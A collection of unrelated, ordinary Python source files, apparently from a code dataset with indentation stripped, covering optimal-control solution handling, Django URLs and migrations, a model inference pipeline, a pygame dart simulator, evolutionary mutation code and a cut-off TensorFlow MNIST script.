if val.shape[0] != x0.shape[0]:
raise RuntimeError(
f"Phase transition must have the same number of states ({val.shape[0]}) "
f"when integrating with Shooting.SINGLE_CONTINUOUS. If it is not possible, "
f"please integrate with Shooting.SINGLE"
)
x0 += np.array(val)[:, 0]
else:
col = slice(0, n_steps) if nlp.ode_solver.is_direct_collocation and not use_scipy_integrator else 0
x0 = self._states[p]["all"][:, col]
for s in range(self.ns[p]):
if nlp.control_type == ControlType.CONSTANT:
u = self._controls[p]["all"][:, s]
elif nlp.control_type == ControlType.LINEAR_CONTINUOUS:
u = self._controls[p]["all"][:, s : s + 2]
else:
raise NotImplementedError(f"ControlType {nlp.control_type} " f"not yet implemented in integrating")
if use_scipy_integrator:
t_init = sum(out.phase_time[:p]) / nlp.ns
t_end = sum(out.phase_time[: (p + 2)]) / nlp.ns
n_points = n_steps + 1 if continuous else n_steps
t_eval = np.linspace(t_init, t_end, n_points) if keep_intermediate_points else [t_init, t_end]
integrated = solve_ivp(
lambda t, x: np.array(nlp.dynamics_func(x, u, params))[:, 0], [t_init, t_end], x0, t_eval=t_eval
).y
next_state_col = (
(s + 1) * (nlp.ode_solver.steps + 1) if nlp.ode_solver.is_direct_collocation else s + 1
)
cols_in_out = [s * n_steps, (s + 1) * n_steps] if keep_intermediate_points else [s, s + 2]
else:
if nlp.ode_solver.is_direct_collocation:
if keep_intermediate_points:
integrated = x0 # That is only for continuous=False
cols_in_out = [s * n_steps, (s + 1) * n_steps]
else:
integrated = x0[:, [0, -1]]
cols_in_out = [s, s + 2]
next_state_col = slice((s + 1) * n_steps, (s + 2) * n_steps)
else:
if keep_intermediate_points:
integrated = np.array(nlp.dynamics[s](x0=x0, p=u, params=params / param_scaling)["xall"])
cols_in_out = [s * n_steps, (s + 1) * n_steps]
else:
integrated = np.concatenate(
(x0[:, np.newaxis], nlp.dynamics[s](x0=x0, p=u, params=params / param_scaling)["xf"]),
axis=1,
)
cols_in_out = [s, s + 2]
next_state_col = s + 1
cols_in_out = slice(
cols_in_out[0], cols_in_out[1] + 1 if continuous and keep_intermediate_points else cols_in_out[1]
)
out._states[p]["all"][:, cols_in_out] = integrated
x0 = (
np.array(self._states[p]["all"][:, next_state_col])
if shooting_type == Shooting.MULTIPLE
else integrated[:, -1]
)
if not continuous:
out._states[p]["all"][:, -1] = self._states[p]["all"][:, -1]
# Dispatch the integrated values to all the keys
for key in nlp.states:
out._states[p][key] = out._states[p]["all"][nlp.states[key].index, :]
return out
def interpolate(self, n_frames: Union[int, list, tuple]) -> Any:
"""
Interpolate the states
Parameters
----------
n_frames: Union[int, list, tuple]
If the value is an int, the Solution returns merges the phases,
otherwise, it interpolates them independently
Returns
-------
A Solution data structure with the states integrated. The controls are removed from this structure
"""
out = self.copy(skip_data=True)
t_all = []
for p, data in enumerate(self._states):
nlp = self.ocp.nlp[p]
if nlp.ode_solver.is_direct_collocation and not self.recomputed_time_steps:
time_offset = sum(out.phase_time[: p + 1])
step_time = np.array(nlp.dynamics[0].step_time)
dt = out.phase_time[p + 1] / nlp.ns
t_tp = np.array([step_time * dt + s * dt + time_offset for s in range(nlp.ns)]).reshape(-1, 1)
t_all.append(np.concatenate((t_tp, [[t_tp[-1, 0]]]))[:, 0])
else:
t_all.append(np.linspace(sum(out.phase_time[: p + 1]), sum(out.phase_time[: p + 2]), out.ns[p] + 1))
if isinstance(n_frames, int):
data_states, _, out.phase_time, out.ns = self._merge_phases(skip_controls=True)
t_all = [np.concatenate((np.concatenate([_t[:-1] for _t in t_all]), [t_all[-1][-1]]))]
n_frames = [n_frames]
out.is_merged = True
elif isinstance(n_frames, (list, tuple)) and len(n_frames) == len(self._states):
data_states = self._states
else:
raise ValueError(
"n_frames should either be a int to merge_phases phases "
"or a list of int of the number of phases dimension"
)
out._states = []
for _ in range(len(data_states)):
out._states.append({})
for p in range(len(data_states)):
x_phase = data_states[p]["all"]
n_elements = x_phase.shape[0]
t_phase = t_all[p]
t_phase, time_index = np.unique(t_phase, return_index=True)
t_int = np.linspace(t_phase[0], t_phase[-1], n_frames[p])
x_interpolate = np.ndarray((n_elements, n_frames[p]))
for j in range(n_elements):
s = sci_interp.splrep(t_phase, x_phase[j, time_index], k=1)
x_interpolate[j, :] = sci_interp.splev(t_int, s)
out._states[p]["all"] = x_interpolate
offset = 0
for key in data_states[p]:
if key == "all":
continue
n_elements = data_states[p][key].shape[0]
out._states[p][key] = out._states[p]["all"][offset : offset + n_elements]
offset += n_elements
out.is_interpolated = True
return out
def merge_phases(self) -> Any:
"""
Get a data structure where all the phases are merged into one
Returns
-------
The new data structure with the phases merged
"""
new = self.copy(skip_data=True)
new.parameters = deepcopy(self.parameters)
new._states, new._controls, new.phase_time, new.ns = self._merge_phases()
new.is_merged = True
return new
def _merge_phases(self, skip_states: bool = False, skip_controls: bool = False, continuous: bool = True) -> tuple:
"""
Actually performing the phase merging
Parameters
----------
skip_states: bool
If the merge should ignore the states
skip_controls: bool
If the merge should ignore the controls
continuous: bool
If the last frame of each phase should be kept [False] or discard [True]
Returns
-------
A tuple containing the new states, new controls, the recalculated phase time
and the new number of shooting points
"""
if self.is_merged:
return deepcopy(self._states), deepcopy(self._controls), deepcopy(self.phase_time), deepcopy(self.ns)
def _merge(data: list, is_control: bool) -> Union[list, dict]:
"""
Merge the phases of a states or controls data structure
Parameters
----------
data: list
The data to structure to merge the phases
is_control: bool
If the current data is a control
Returns
-------
The data merged
"""
if isinstance(data, dict):
return data
# Sanity check (all phases must contain the same keys with the same dimensions)
keys = data[0].keys()
sizes = [data[0][d].shape[0] for d in data[0]]
for d in data:
if d.keys() != keys or [d[key].shape[0] for key in d] != sizes:
raise RuntimeError("Program dimension must be coherent across phases to merge_phases them")
data_out = [{}]
for i, key in enumerate(keys):
data_out[0][key] = np.ndarray((sizes[i], 0))
add = 0 if is_control or continuous else 1
for p in range(len(data)):
d = data[p]
for key in d:
if self.ocp.nlp[p].ode_solver.is_direct_collocation and not is_control:
steps = self.ocp.nlp[p].ode_solver.steps + 1
data_out[0][key] = np.concatenate(
(data_out[0][key], d[key][:, : self.ns[p] * steps + add]), axis=1
)
else:
data_out[0][key] = np.concatenate((data_out[0][key], d[key][:, : self.ns[p] + add]), axis=1)
if add == 0:
for key in data[-1]:
data_out[0][key] = np.concatenate((data_out[0][key], data[-1][key][:, -1][:, np.newaxis]), axis=1)
return data_out
if len(self._states) == 1:
out_states = deepcopy(self._states)
else:
out_states = _merge(self.states, is_control=False) if not skip_states and self._states else None
if len(self._controls) == 1:
out_controls = deepcopy(self._controls)
else:
out_controls = _merge(self.controls, is_control=True) if not skip_controls and self._controls else None
phase_time = [0] + [sum([self.phase_time[i + 1] for i in range(len(self.phase_time) - 1)])]
ns = [sum(self.ns)]
return out_states, out_controls, phase_time, ns
def _complete_control(self):
"""
Controls don't necessarily have dimensions that matches the states. This method aligns them
"""
for p, nlp in enumerate(self.ocp.nlp):
if nlp.control_type == ControlType.CONSTANT:
for key in self._controls[p]:
self._controls[p][key] = np.concatenate(
(self._controls[p][key], np.nan * np.zeros((self._controls[p][key].shape[0], 1))), axis=1
)
elif nlp.control_type == ControlType.LINEAR_CONTINUOUS:
pass
else:
raise NotImplementedError(f"ControlType {nlp.control_type} is not implemented in _complete_control")
def graphs(
self,
automatically_organize: bool = True,
show_bounds: bool = False,
show_now: bool = True,
shooting_type: Shooting = Shooting.MULTIPLE,
use_scipy_integrator: bool = False,
):
"""
Show the graphs of the simulation
Parameters
----------
automatically_organize: bool
If the figures should be spread on the screen automatically
show_bounds: bool
If the plot should adapt to bounds (True) or to data (False)
show_now: bool
If the show method should be called. This is blocking
shooting_type: Shooting
The type of interpolation
use_scipy_integrator: bool
Use the scipy solve_ivp integrator for RungeKutta 45 instead of currently defined integrator
"""
if self.is_merged or self.is_interpolated or self.is_integrated:
raise NotImplementedError("It is not possible to graph a modified Solution yet")
plot_ocp = self.ocp.prepare_plots(automatically_organize, show_bounds, shooting_type, use_scipy_integrator)
plot_ocp.update_data(self.vector)
if show_now:
plt.show()
def animate(
self, n_frames: int = 0, shooting_type: Shooting = None, show_now: bool = True, **kwargs: Any
) -> Union[None, list]:
"""
Animate the simulation
Parameters
----------
n_frames: int
The number of frames to interpolate to. If the value is 0, the data are merged to a one phase if possible.
If the value is -1, the data is not merge in one phase
shooting_type: Shooting
The Shooting type to animate
show_now: bool
If the bioviz exec() function should be called automatically. This is blocking method
kwargs: Any
Any parameters to pass to bioviz
Returns
-------
A list of bioviz structures (one for each phase). So one can call exec() by hand
"""
try:
import bioviz
except ModuleNotFoundError:
raise RuntimeError("bioviz must be install to animate the model")
check_version(bioviz, "2.1.1", "2.2.0")
data_to_animate = self.integrate(shooting_type=shooting_type) if shooting_type else self.copy()
if n_frames == 0:
try:
data_to_animate = data_to_animate.interpolate(sum(self.ns))
except RuntimeError:
pass
elif n_frames > 0:
data_to_animate = data_to_animate.interpolate(n_frames)
states = data_to_animate.states
if not isinstance(states, (list, tuple)):
states = [states]
all_bioviz = []
for idx_phase, data in enumerate(states):
# Convert parameters to actual values
nlp = self.ocp.nlp[idx_phase]
for param in nlp.parameters:
if param.function:
param.function(nlp.model, self.parameters[param.name], **param.params)
all_bioviz.append(bioviz.Viz(self.ocp.nlp[idx_phase].model.path().absolutePath().to_string(), **kwargs))
all_bioviz[-1].load_movement(self.ocp.nlp[idx_phase].variable_mappings["q"].to_second.map(data["q"]))
if show_now:
b_is_visible = [True] * len(all_bioviz)
while sum(b_is_visible):
for i, b in enumerate(all_bioviz):
if b.vtk_window.is_active:
b.update()
else:
b_is_visible[i] = False
return None
else:
return all_bioviz
def _get_penalty_cost(self, nlp, penalty):
phase_idx = nlp.phase_idx
steps = nlp.ode_solver.steps + 1 if nlp.ode_solver.is_direct_collocation else 1
val = []
val_weighted = []
p = self.parameters["all"]
dt = (
Function("time", [nlp.parameters.cx], [penalty.dt])(self.parameters["time"])
if "time" in self.parameters
else penalty.dt
)
for idx in penalty.node_idx:
x = []
u = []
target = []
if nlp is not None:
if penalty.transition:
phase_post = (phase_idx + 1) % len(self._states)
x = np.concatenate((self._states[phase_idx]["all"][:, -1], self._states[phase_post]["all"][:, 0]))
u = np.concatenate(
(self._controls[phase_idx]["all"][:, -1], self._controls[phase_post]["all"][:, 0])
)
else:
col_x_idx = list(range(idx * steps, (idx + 1) * steps)) if penalty.integrate else [idx]
col_u_idx = [idx]
if penalty.derivative or penalty.explicit_derivative:
col_x_idx.append((idx + 1) * steps)
col_u_idx.append((idx + 1))
x = self._states[phase_idx]["all"][:, col_x_idx]
u = self._controls[phase_idx]["all"][:, col_u_idx]
target = penalty.target[:, penalty.node_idx.index(idx)] if penalty.target is not None else []
val.append(penalty.function(x, u, p))
val_weighted.append(penalty.weighted_function(x, u, p, penalty.weight, target, dt))
val = np.nansum(val)
val_weighted = np.nansum(val_weighted)
return val, val_weighted
def print(self, cost_type: CostType = CostType.ALL):
"""
Print the objective functions and/or constraints to the console
Parameters
----------
cost_type: CostType
The type of cost to console print
"""
def print_penalty_list(nlp, penalties, print_only_weighted):
running_total = 0
for penalty in penalties:
if not penalty:
continue
val, val_weighted = self._get_penalty_cost(nlp, penalty)
running_total += val_weighted
if print_only_weighted:
print(f"{penalty.name}: {val_weighted}")
else:
print(f"{penalty.name}: {val: .2f} (weighted {val_weighted})")
return running_total
def print_objective_functions(ocp):
"""
Print the values of each objective function to the console
"""
print(f"\n---- COST FUNCTION VALUES ----")
running_total = print_penalty_list(None, ocp.J_internal, False)
running_total += print_penalty_list(None, ocp.J, False)
if running_total:
print("")
for nlp in ocp.nlp:
print(f"PHASE {nlp.phase_idx}")
running_total += print_penalty_list(nlp, nlp.J_internal, False)
running_total += print_penalty_list(nlp, nlp.J, False)
print("")
print(f"Sum cost functions: {running_total}")
print(f"------------------------------")
def print_constraints(ocp, sol):
"""
Print the values of each constraints with its lagrange multiplier to the console
"""
if sol.constraints is None:
return
# Todo, min/mean/max
print(f"\n--------- CONSTRAINTS ---------")
if print_penalty_list(None, ocp.g_internal, True) + print_penalty_list(None, ocp.g, True):
print("")
for idx_phase, nlp in enumerate(ocp.nlp):
print(f"PHASE {idx_phase}")
print_penalty_list(nlp, nlp.g_internal, True)
print_penalty_list(nlp, nlp.g, True)
print("")
print(f"------------------------------")
if cost_type == CostType.OBJECTIVES:
print_objective_functions(self.ocp)
elif cost_type == CostType.CONSTRAINTS:
print_constraints(self.ocp, self)
elif cost_type == CostType.ALL:
print(
f"Solver reported time: {self.solver_time_to_optimize} sec\n"
f"Real time: {self.real_time_to_optimize} sec"
)
self.print(CostType.OBJECTIVES)
self.print(CostType.CONSTRAINTS)
else:
raise ValueError("print can only be called with CostType.OBJECTIVES or CostType.CONSTRAINTS")
|
python
|
from django.conf.urls.defaults import *
from django.views.generic.simple import redirect_to
import views
urlpatterns = patterns('',
(r'^$', views.home),
# would like to avoid hardcoding mibbinator here
(r'^(o/\.|\.?)(?P<oid>[0-9.]*)$', redirect_to, { 'url': '/mibbinator/o/%(oid)s' }),
(r'^o/(?P<oid>[0-9.]+)$', views.byoid),
(r'^m/(?P<module>[\w-]+)$', views.bymodule),
(r'^(?P<name>\w+)$', views.byname),
)
|
python
|
# coding=utf-8
# Copyright 2021 The OneFlow Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from abc import ABCMeta, abstractmethod
from typing import Any, Dict
import oneflow as flow
from libai.config import LazyConfig, try_get_key
from libai.engine import DefaultTrainer
from libai.utils import distributed as dist
from libai.utils.checkpoint import Checkpointer
from libai.utils.logger import setup_logger
logger = setup_logger(distributed_rank=dist.get_rank())
logger = logging.getLogger("libai.inference")
class BasePipeline(metaclass=ABCMeta):
"""
Base class for all task pipeline
"""
def __init__(
self,
config_file,
data_parallel=None,
tensor_parallel=None,
pipeline_parallel=None,
**kwargs,
):
# init cfg
self.cfg = LazyConfig.load(config_file)
flow.boxing.nccl.set_fusion_threshold_mbytes(
try_get_key(self.cfg, "train.nccl_fusion_threshold_mb", default=16)
)
flow.boxing.nccl.set_fusion_max_ops_num(
try_get_key(self.cfg, "train.nccl_fusion_max_ops", default=24)
)
self.update_cfg(data_parallel, tensor_parallel, pipeline_parallel)
dist.setup_dist_util(self.cfg.train.dist)
assert (
self.cfg.train.dist.data_parallel_size == 1
), "not support data parallel yet, only support tensor and pipeline parallel"
logger.info(self.cfg.train.dist)
# initial and load model
self.model = DefaultTrainer.build_model(self.cfg).eval()
self.load_pretrain_weight(self.model, self.cfg)
# initial tokenizer
self.tokenizer = self.build_tokenizer(self.cfg)
# set parameters
(
self._preprocess_params,
self._forward_params,
self._postprocess_params,
) = self._parse_parameters(**kwargs)
def update_cfg(
self,
data_parallel=1,
tensor_parallel=1,
pipeline_parallel=1,
):
self.cfg.train.dist.data_parallel_size = data_parallel
self.cfg.train.dist.tensor_parallel_size = tensor_parallel
self.cfg.train.dist.pipeline_parallel_size = pipeline_parallel
if self.cfg.train.dist.pipeline_parallel_size > 1:
assert (
try_get_key(self.cfg.train.dist, "pipeline_num_layers") is not None
), "cfg.train.dist.pipeline_num_layers must be set when run pipeline parallel"
def load_pretrain_weight(self, model, cfg):
Checkpointer(model, save_dir=cfg.train.output_dir).resume_or_load(
cfg.train.load_weight, resume=False
)
def build_tokenizer(self, cfg):
tokenizer = None
if try_get_key(cfg, "tokenization") is not None:
tokenizer = DefaultTrainer.build_tokenizer(cfg)
return tokenizer
@abstractmethod
def _parse_parameters(self, **pipeline_parameters):
raise NotImplementedError("_parse_parameters not implemented")
def __call__(self, inputs, *args, batch_size=None, **kwargs) -> dict:
preprocess_params, forward_params, postprocess_params = self._parse_parameters(
**kwargs
) # noqa
# Fuse __init__ params and __call__ params without modifying the __init__ ones.
preprocess_params = {**self._preprocess_params, **preprocess_params}
forward_params = {**self._forward_params, **forward_params}
postprocess_params = {**self._postprocess_params, **postprocess_params}
with flow.no_grad():
model_inputs_dict = self.preprocess(inputs, **preprocess_params)
model_outputs_dict = self.forward(model_inputs_dict, **forward_params)
model_outputs_dict = self.to_local(model_outputs_dict)
if dist.is_main_process():
outputs_dict = self.postprocess(model_outputs_dict, **postprocess_params)
else:
outputs_dict = {}
dist.synchronize()
return outputs_dict
def to_local(self, model_outputs_dict):
for key, value in model_outputs_dict.items():
if isinstance(value, flow.Tensor) and value.is_global:
model_outputs_dict[key] = dist.ttol(
value, ranks=[0] if value.placement.ranks.ndim == 1 else [[0]]
)
if flow.cuda.is_available():
dist.synchronize()
return model_outputs_dict
@abstractmethod
def preprocess(self, input_: Any, **preprocess_parameters: Dict) -> dict:
raise NotImplementedError("preprocess not implemented")
@abstractmethod
def forward(self, **kwargs: Dict) -> dict:
raise NotImplementedError("forward not implemented")
@abstractmethod
def postprocess(self, **kwargs: Dict) -> dict:
raise NotImplementedError("postprocess not implemented")
|
python
|
# Generated by Django 3.1 on 2020-10-19 16:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0013_auto_20201020_0122'),
]
operations = [
migrations.AlterField(
model_name='restaurant',
name='business_number',
field=models.CharField(max_length=30, null=True),
),
migrations.AlterField(
model_name='restaurant',
name='open_time',
field=models.CharField(max_length=13, null=True),
),
]
|
python
|
from jax import numpy as jnp
from typing import Callable
def weighted_dot(sigma_i: float, sigma_r: float, sigma_b: float) -> Callable:
"""Defines weighed dot product, i.e. <u, v> with u = [i, j]
Returns function which calculates the product given the weights.
"""
def dot(gram: jnp.ndarray, kernel: jnp.ndarray) -> jnp.ndarray:
return sigma_i ** 2 * gram + sigma_r ** 2 * kernel + sigma_b ** 2
return dot
|
python
|
import requests,json
from HelperTools import Debug
import os
sourceStreamInfoListUrl = os.getenv('SourceStream')
GetNotFixedStreamAPIUrl = os.getenv("NotFixedStreamAPI")
# 需要做代理的源流信息
sourceStreamInfoList = {}
def GetSourceStreamInfoList():
if sourceStreamInfoListUrl == None or sourceStreamInfoListUrl == "default_source_stream_url":
Debug.Log("SourceStream is null,so return GetSourceStreamInfoList")
return
resultData = requests.get(sourceStreamInfoListUrl)
resultJson = json.loads(resultData.text)
sourceStreamInfoList.clear()
for oneStream in resultJson:
sourceStreamInfoList[oneStream["url"]] = {}
sourceStreamInfoList[oneStream["url"]]["bFixedUrl"] = bool(int(oneStream["FIXEDURL"]))
sourceStreamInfoList[oneStream["url"]]["url"] = oneStream["CAMERAINDEXCODE"]
Debug.Log(f"GetSourceStreamInfoList:{sourceStreamInfoList}")
return sourceStreamInfoList
GetSourceStreamInfoList()
def GetUnFixedUrl(UnFixedStreamUrl):
if GetNotFixedStreamAPIUrl == None or GetNotFixedStreamAPIUrl == "default_notfixed_stream_url":
Debug.Log("NotFixedStreamAPI is null,so return GetUnFixedUrl")
return None
requestData = {
"url": UnFixedStreamUrl
}
resultData = requests.get(GetNotFixedStreamAPIUrl, params=requestData)
resultJson = json.loads(resultData.text)
if int(resultJson["code"]) == 0 and resultJson["msg"] == "success":
return resultJson["data"]["url"]
|
python
|
import pygame as p
import dartboard
import buttonPanel
import statPanel
from dartboard import PERCENTAGES, LASTBULLSEYE
WIDTH = 800
HEIGHT = 700
BACKGROUND = p.Color("red")
MAX_FPS = 30
def main():
global throwing
p.init()
screen = p.display.set_mode((WIDTH, HEIGHT))
screen.fill(BACKGROUND)
p.display.set_caption("Dart Sim V. 1")
clock = p.time.Clock()
dartboard.draw(screen)
buttons = buttonPanel.draw(screen)
running = True
throwing = False
while running:
for e in p.event.get():
if e.type == p.QUIT:
running = False
if e.type == p.MOUSEBUTTONDOWN:
if buttons[0].collidepoint(e.pos): # start button
throwing = True
p.draw.rect(screen, p.Color("light green"), buttons[0])
p.draw.rect(screen, p.Color("red"), buttons[1])
p.draw.rect(screen, p.Color("blue"), buttons[2])
elif buttons[1].collidepoint(e.pos): # stop button
throwing = False
p.draw.rect(screen, p.Color("green"), buttons[0])
p.draw.rect(screen, p.Color("tomato"), buttons[1])
p.draw.rect(screen, p.Color("blue"), buttons[2])
elif buttons[2].collidepoint(e.pos): # reset button
reset(screen)
p.draw.rect(screen, p.Color("green"), buttons[0])
p.draw.rect(screen, p.Color("red"), buttons[1])
p.draw.rect(screen, p.Color("cyan"), buttons[2])
if throwing:
dartboard.throwDartRandomly(screen)
statPanel.draw(screen)
buttonPanel.draw(screen)
p.display.flip()
clock.tick(MAX_FPS)
def reset(screen):
global throwing #add this to main()
dartboard.draw(screen)
throwing = False
dartboard.NUM_DARTS = 0
dartboard.LASTBULLSEYE = 0
dartboard.PERCENTAGES = [0, 0, 0, 0, 0, 0]
dartboard.SPOTS = [0, 0, 0, 0, 0, 0] #reset count in all rings
main()
|
python
|
import copy
import inspect
import math
import numpy as np
import random
def create_new_children_through_cppn_mutation(pop, print_log, new_children=None, mutate_network_probs=None,
max_mutation_attempts=1500):
"""Create copies, with modification, of existing individuals in the population.
Parameters
----------
pop : Population class
This provides the individuals to mutate.
print_log : PrintLog()
For logging
new_children : a list of new children created outside this function (may be empty)
This is useful if creating new children through multiple functions, e.g. Crossover and Mutation.
mutate_network_probs : probability, float between 0 and 1 (inclusive)
The probability of mutating each network.
max_mutation_attempts : int
Maximum number of invalid mutation attempts to allow before giving up on mutating a particular individual.
Returns
-------
new_children : list
A list of new individual SoftBots.
"""
if new_children is None:
new_children = []
random.shuffle(pop.individuals)
while len(new_children) < pop.pop_size:
for ind in pop:
clone = copy.deepcopy(ind)
if mutate_network_probs is None:
required = 0
else:
required = mutate_network_probs.count(1)
selection = []
while np.sum(selection) <= required:
if mutate_network_probs is None:
# uniformly select networks
selection = np.random.random(len(clone.genotype)) < 1 / float(len(clone.genotype))
else:
# use probability distribution
selection = np.random.random(len(clone.genotype)) < mutate_network_probs
# don't select any frozen networks (used to freeze aspects of genotype during evolution)
for idx in range(len(selection)):
if clone.genotype[idx].freeze:
selection[idx] = False
selected_networks = np.arange(len(clone.genotype))[selection].tolist()
for rank, goal in pop.objective_dict.items():
setattr(clone, "parent_{}".format(goal["name"]), getattr(clone, goal["name"]))
clone.parent_genotype = ind.genotype
clone.parent_id = clone.id
for name, details in clone.genotype.to_phenotype_mapping.items():
details["old_state"] = copy.deepcopy(details["state"])
for selected_net_idx in selected_networks:
mutation_counter = 0
done = False
while not done:
mutation_counter += 1
candidate = copy.deepcopy(clone)
# perform mutation(s)
for _ in range(candidate.genotype[selected_net_idx].num_consecutive_mutations):
if not clone.genotype[selected_net_idx].direct_encoding:
# using CPPNs
mut_func_args = inspect.getargspec(candidate.genotype[selected_net_idx].mutate)
mut_func_args = [0 for _ in range(1, len(mut_func_args.args))]
choice = random.choice(range(len(mut_func_args)))
mut_func_args[choice] = 1
variation_type, variation_degree = candidate.genotype[selected_net_idx].mutate(*mut_func_args)
else:
# direct encoding with possibility of evolving mutation rate
# TODO: enable cppn mutation rate evolution
rate = None
for net in clone.genotype:
if "mutation_rate" in net.output_node_names:
rate = net.values # evolved mutation rates, one for each voxel
if "mutation_rate" not in candidate.genotype[selected_net_idx].output_node_names:
# use evolved mutation rates
variation_type, variation_degree = candidate.genotype[selected_net_idx].mutate(rate)
else:
# this is the mutation rate itself (use predefined meta-mutation rate)
variation_type, variation_degree = candidate.genotype[selected_net_idx].mutate()
if variation_degree != "":
candidate.variation_type = "{0}({1})".format(variation_type, variation_degree)
else:
candidate.variation_type = str(variation_type)
candidate.genotype.express()
if candidate.genotype[selected_net_idx].allow_neutral_mutations:
done = True
clone = copy.deepcopy(candidate) # SAM: ensures change is made to every net
break
else:
for name, details in candidate.genotype.to_phenotype_mapping.items():
new = details["state"]
old = details["old_state"]
changes = np.array(new != old, dtype=np.bool)
if np.any(changes) and candidate.phenotype.is_valid():
done = True
clone = copy.deepcopy(candidate) # SAM: ensures change is made to every net
break
# for name, details in candidate.genotype.to_phenotype_mapping.items():
# if np.sum( details["old_state"] != details["state"] ) and candidate.phenotype.is_valid():
# done = True
# break
if mutation_counter > max_mutation_attempts:
print_log.message("Couldn't find a successful mutation in {} attempts! "
"Skipping this network.".format(max_mutation_attempts))
num_edges = len(clone.genotype[selected_net_idx].graph.edges())
num_nodes = len(clone.genotype[selected_net_idx].graph.nodes())
print_log.message("num edges: {0}; num nodes {1}".format(num_edges, num_nodes))
break
# end while
if not clone.genotype[selected_net_idx].direct_encoding:
for output_node in clone.genotype[selected_net_idx].output_node_names:
clone.genotype[selected_net_idx].graph.node[output_node]["old_state"] = ""
# reset all objectives we calculate in VoxCad to unevaluated values
for rank, goal in pop.objective_dict.items():
if goal["tag"] is not None:
setattr(clone, goal["name"], goal["worst_value"])
clone.id = pop.max_id
pop.max_id += 1
new_children.append(clone)
return new_children
def mutate_controllers(pop, children, crossover_rate=0.4):
# controllers crossover
random.shuffle(children)
for i in range(0, int(math.floor(crossover_rate*pop.pop_size))):
indices = random.sample(range(len(pop)), 2)
contr_1 = pop[indices[0]].genotype.controller
contr_2 = pop[indices[1]].genotype.controller
child_contr = children[i].genotype.controller
for attr in child_contr.__dict__.keys():
child_contr[attr] = (contr_1[attr]+contr_2[attr])/2
random.shuffle(children)
for child in children:
child.genotype.controller.mutate()
return children
def mutate_new_materials(pop, children, crossover_rate=0.4):
# new materials crossover
random.shuffle(children)
for i in range(0, int(math.floor(crossover_rate * pop.pop_size))):
indices = random.sample(range(len(pop)), 2)
new_materials_1 = pop[indices[0]].genotype.materials
new_materials_2 = pop[indices[1]].genotype.materials
child_new_materials = children[i].genotype.materials
for material_idx in child_new_materials.keys():
child_new_materials[material_idx].young_modulus = (new_materials_1.get(
material_idx).young_modulus + new_materials_2.get(material_idx).young_modulus) / 2
child_new_materials[material_idx].density = (new_materials_1.get(
material_idx).density + new_materials_2.get(material_idx).density) / 2
child_new_materials[material_idx].cte = (new_materials_1.get(
material_idx).cte + new_materials_2.get(material_idx).cte) / 2
random.shuffle(children)
for child in children:
for material_idx in child.genotype.materials.keys():
if material_idx == "9":
# counterphase actuation
child.genotype.materials[material_idx].young_modulus = child.genotype.materials["8"].young_modulus
child.genotype.materials[material_idx].density = child.genotype.materials["8"].density
child.genotype.materials[material_idx].cte = -child.genotype.materials["8"].cte
else:
child.genotype.materials[material_idx].mutate()
return children
def create_new_children(pop, print_log):
"""Create copies, with modification, of existing individuals in the population.
Parameters
----------
pop : Population class
This provides the individuals to mutate.
print_log : PrintLog()
For logging
"""
cppn_mutated_children = create_new_children_through_cppn_mutation(pop, print_log)
controller_evolution = hasattr(pop[0].genotype, "controller")
materials_evolution = hasattr(pop[0].genotype, "materials")
if controller_evolution:
new_children = mutate_controllers(pop, cppn_mutated_children)
elif materials_evolution:
new_children = mutate_new_materials(pop, cppn_mutated_children)
else:
new_children = cppn_mutated_children
return new_children
def genome_wide_mutation(pop, print_log):
mutate_network_probs = [1 for _ in range(len(pop[0].genotype))]
return create_new_children_through_cppn_mutation(pop, print_log, mutate_network_probs=mutate_network_probs)
|
python
|
import sys
def solution(A):
difference = sys.maxsize
left = 0
right = sum(A)
for i in range(0, len(A)-1):
left += A[i]
right -= A[i]
if abs(right - left) < difference:
difference = abs(right - left)
return difference
def test_solution():
assert solution([3, 1, 2, 4, 3]) == 1
|
python
|
import json
def readJsonFromFile(filename):
file = open(filename, 'r')
arr = json.loads(file.read())
file.close()
return arr
|
python
|
from enum import Enum
class TaskState(Enum):
# static states:
# a task can either succeed or fail
VALID = 0x0
INVALID = 0x1
# actionable states
DROP = 0x10
DONE = 0x99
class TaskConfigState(Enum):
VALID = 0x0
INVALID = 0x1
|
python
|
import os
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('/tmp/data', one_hot=True)
# Path to Computation graphs
LOGDIR = './graphs'
# Start session
sess = tf.Session()
# Hyper parameters
LEARNING_RATE = 0.01
BATCH_SIZE = 1000
EPOCHS = 10
# Hidden Layers
HL_1 = 1000
HL_2 = 500
# Other parameters
INPUT_SIZE = 28 * 28
N_CLASSES = 10
with tf.name_scope('input'):
images = tf.placeholder(tf.float32, [None, INPUT_SIZE], name="images")
labels = tf.placeholder(tf.float32, [None, N_CLASSES], name="labels")
def fc_layer(x, layer, size_out, activation=None):
with tf.name_scope(layer):
size_in = int(x.shape[1])
W = tf.Variable(tf.random_normal([size_in, size_out]), name="weights")
b = tf.Variable(tf.constant(-1, dtype=tf.float32, shape=[size_out]), name="biases")
wx_plus_b = tf.add( tf.matmul(x, W), b)
if activation:
return activation(wx_plus_b)
return wx_plus_b
fc_1 = fc_layer(images, 'fc_1', HL_1, tf.nn.relu)
fc_2 = fc_layer(fc_1, 'fc_2', HL_2, tf.nn.relu)
#to prevent overfitting
dropped = tf.nn.dropout(fc_2, keep_prob=0.9)
# output layer
y = fc_layer(dropped, 'output', N_CLASSES)
with tf.name_scope('loss'):
loss = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(logits=y, labels=labels))
tf.summary.scalar('loss', loss)
with tf.name_scope('optimizer'):
train = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)
with tf.name_scope('evaluation'):
correct = tf.equal( tf.argmax(y, 1 ), tf.argmax(labels, 1))
accuracy = tf.reduce_mean( tf.cast(correct, dtype=tf.float32))
tf.summary.scalar('accuracy', accuracy)
train_writer = tf.summary.FileWriter(os.path.join(LOGDIR, "train"), sess.graph)
test_writer = tf.summary.FileWriter(os.path.join(LOGDIR, "test"), sess.graph)
summary_op = tf.summary.merge_all()
init = tf.global_variables_initializer()
sess.run(init)
with tf.name_scope('training'):
